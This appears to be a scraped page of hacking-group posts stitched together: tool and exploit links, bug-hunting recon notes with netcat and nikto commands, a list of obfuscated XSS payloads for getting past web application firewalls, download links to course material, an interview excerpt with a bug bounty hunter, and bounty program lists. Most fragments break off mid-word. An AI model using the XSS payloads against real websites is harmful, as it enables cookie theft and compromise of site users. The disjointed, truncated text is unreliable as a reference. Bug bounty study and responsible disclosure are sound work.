All About Hacking & Cybersecurity

Github https://github.com/e-ago/ bitcracker Shakaal ™: Attify OS - Distro for pentesting IoT devices https://github.com/adi0x90/attifyos https://github.com/frizb/OSCP-Survival-Guide/blob/master/README.md https://github.com/Mr-Un1k0d3r/ThunderShell Shakaal ™: https://github.com/karelorigin/XSS-Problems/blob/master/README.md , Tools for penetration testers that can enumerate which users logged on windows systems  |  https://github.com/galkan/ kacak https://github.com/HSIS007/Useful_Websites_For_Pentester [9/30, 11:12 AM] Python: https://github.com/mjain61/Lulzsec_Mailer [9/30, 4:10 PM] Python: https://github.com/1modm/stegator [10/2, 10:26 AM] Python: https://github.com/tbhaxor/webzipper [10/2, 10:38 AM] Python: https://github.com/ojasookert/CVE-2017-0785 [9/28, 1:46 PM] Python: https://github.com/EdOverflow/bugbounty-cheatsheet [9/28, 1:49 PM] Python: https://github.com/cujanovic/SSRF-Testing [9/28, 2:03 PM] Python: https://github.com/cujanovic/Markdown-XSS-Payloads/blo

Some Private Notes on Bug Hunting Aashish Kunvar Anon haxo: ########By dorkerdevil ##############                 Hope you like it #NavinYadav bro for u n for group                                                                                                                                                                                            Hack Notes echo -e "HEAD /HTTP/1.0\n\n" | nc -vv website.com echo -e "HEAD /HTTP/1.0\n\n" | openssl s_client -quit -connect website:443 nikto -p 80 -h website -verbose whisker2.1 -p 80 -h website enum all extensions: .asp,.aspx,.css,.htc,.htr,.htw,.ida,.idc,.idq,.printer,.shtm,.xml,.xsl previous version of pages:~ extensions: .bak,.old,.orig,.txt search for common directories such as:~ /bak,/inc,/old,/script SQL connection strings:~ db= dbconn= ~:xss payloads to check:~ <script>alert(document.cookie)</script> 1.attempt different embedding method: %3cscript%3e, %253cscript%253e, %00%3cscript%

Streaak: Bug bounty forum https://bugbountyforum.com/blog/ama/nahamsec / https://bugbountyforum.com/blog/ama/yaworsk / https://bugbountyforum.com/blog/ama/jstnkndy / https://bugbountyforum.com/blog/ama/itsecurityguard / https://bugbountyforum.com/blog/ama/avlidienbrunn / @irPentesters

Web hacking bounty material https://mega.nz/#!4aRhnBCB!3566O84qBbGOvhXUk-8XAFL4bClp-rjcGWfkzl0X9M8 Certificacion de Seguridad-mexico (Curso) https://mega.nz/#!dJhVGapQ!UTsr9XlwatkVB5YWQ3PMjPbD32-DtESydlpxkjgJNs0 https://mega.nz/#!ZZ4xVa5R!JkAgL2JKmbeAdccVr2KTbNbI1fac6z_qjyApkn-YgL0 https://mega.nz/#!oYQBFaaQ!LJbJmqmrx3Oauq7vgimqQ2xPtFspLzzsyi7AHVR9HRY https://mega.nz/#!MMgQHApT!Ocz-ftOD1bC6aUVo0DJwKhe4TglYos_Vt5FckG_l9A4 https://mega.nz/#!4FoEAKYK!-55xUlQvGnemeT5A-3Pck68xEgg470h--Srp334Kb7k https://mega.nz/#!ZE4AQDSB!wN6hxKTC4YQLODau-OXwhctQse6sy8XrsxBgosNmviQ https://mega.nz/#!Ico0zSrA!Lh4TcmSuxRv3qb0VPI6yvM4KtA5h20my3W6SPd4Dbvc https://mega.nz/#!dAYhnJLb!utHluCuQycDuKZbTtUHpwZuOUFmMza0MVYoD8q_g1iU https://mega.nz/#!AEInSI5C!9jy-iSyCPSIpfF8mND6J8M1_YDQf9KkwEKiCOKzMMqM https://mega.nz/#!IFxUSQaK!RjIlGmQh7095A44oj6o0MvRyxEcRtFP3xrTGLHLmp9Y https://mega.nz/#!oAIgTDxY!b0O-77yh60vtybZsVB6XcltmJ4hpAyzHJwWjBBWO9DI https://mega.nz/#!IMI1TZqY!Va3U0jv-UeneNDqMO09Z2cNNobb9we8Zlb7RJ

JuanDeLemos: Some XSS payload starts  <!'/*!"/*!//'/*//"/*--!> or >');'>%>?>">">\x22\x3e/*-->]]> <!'/*!"/*!//'/*//"/*--!><Input/Autofocus/%0D*/Onfocus=confirm`1`//><Svg> Fuck WAF <script>a=xss<!--<script/\;</script><input value="${alert(1)}`</script/"> Fuck WAF with string obfuscation <script>eval(ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(666));</script/"> XSS in href link <a href="" onclick=``/name==alert(1)>clickme1</a> or <a href="" onclick=``/*/alt="*//alert(1)//">clickme2</a> Rewrite page <a href="javascript:document.write('c========3'); void(0);">Middle-click me</a> New test   '\"--!><Body /Onpageshow=confirm`1`> "-->'><script>alert(1);</script>" List of different XSS Cheat

TECH INTERVIEW: This Indian Hacker Has Earned ₹2.2 Crore By Finding Bugs In Facebook, Twitter, And Other websites Anand Prakash is planning his own cybersecurity startup.   Dungeon Masterl ||Tech News Editor ANAND PRAKASH India has no shortage of software talent. For proof, look no further than security researcher Anand Prakash, who is in news once again for winning  a $5,000 reward from Uber after he pointed out a bug in their software that could have allowed users to take unlimited free rides. This is not the first time that Prakash has won a reward for pointing out a security flaw in a website. Over the years, he has alerted big corporations such as Facebook, Twitter and Google about potentially expensive and risky software loopholes on their websites. HuffPost India  caught up with India's top bug bounty hunter for a chat. Here are edited excerpts from the conversation — How did you get interested in hacking? In 2010, I was in Kota, taking an entrance course there.

  Geekboy | Security Researcher Bug Bounty Hunter Starting Bug Bounty ? | Bug Bounty Resources Hey all  this post is not about any of my findings, its about resources for the bug bounties for learners, no matter you are starting or experienced, there is always something to learn from others. and if you are just starting into bug bounty then surly its going to be helpful post, and some kind of necessary to do as nowadays seen many new guys starting bug bounty by seeing that $$, its good that you want to make $$ from it but before that you should understand the process , quality and report writing which will help you to make more $$, so its better to understand 1st and then go for it. so here am going to add some links which have lots of info’s, resources, writeups about i was talking before. How to Become a Successful Bug Bounty HunterHow to become a Bug Bounty Hunter Bug Bounties 101The life of a bug bounty hunter Bounty Bug Write-upsFacebook Bug Bounties ap

What is the Bug Bounty Program? Bug Bounty program provides recognition and compensation to security researchers practising responsible disclosure. Company started Bug Bounty programs for improve their security, Cyber security researchers are finding vulnerabilities on top websites and get rewarded. Reward Programs AT&T – http://developer.att.com/developer/apiDetailPage.jsp?passedItemId=10700235 (To submit you need to sign up to the free Developer API program)Avast! – http://www.avast.com/bug-bountyBarracuda – http://barracudalabs.com/Coinbase – https://coinbase.com/whitehatChromium Project – http://www.chromium.org/CrowdShield – https://crowdshield.com/Cryptocat – https://crypto.cat/bughunt/Facebook – http://www.facebook.com/whitehat/Etsy – http://www.etsy.com/help/article/2463Gallery – http://codex.gallery2.org/BountiesGhostscript – http://ghostscript.com/Bug_bounty_program.html (Mostly software development, occasional security issues)Google – http://www.google.